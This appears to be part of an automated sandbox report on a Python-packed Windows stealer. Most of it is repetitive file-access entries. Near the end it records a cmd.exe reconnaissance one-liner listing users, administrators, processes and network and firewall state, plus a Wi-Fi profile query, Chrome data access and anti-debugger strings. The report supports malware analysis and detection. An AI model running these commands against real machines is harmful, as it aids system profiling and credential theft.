            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
            Source: C:\Windows\System32\mshta.exe  Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Windows\System32\mshta.exe  Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Windows\System32\mshta.exe  Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Windows\System32\mshta.exe  Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exe  Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\net1.exe  Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\rename_me_before.exe  Code function: 0_2_00007FF6404EC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6404EC330
            Source: C:\Users\user\Desktop\rename_me_before.exe  Code function: 0_2_00007FF640504F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF640504F10
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\rename_me_before.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: wireshark.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: ollydbg.exe

            Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
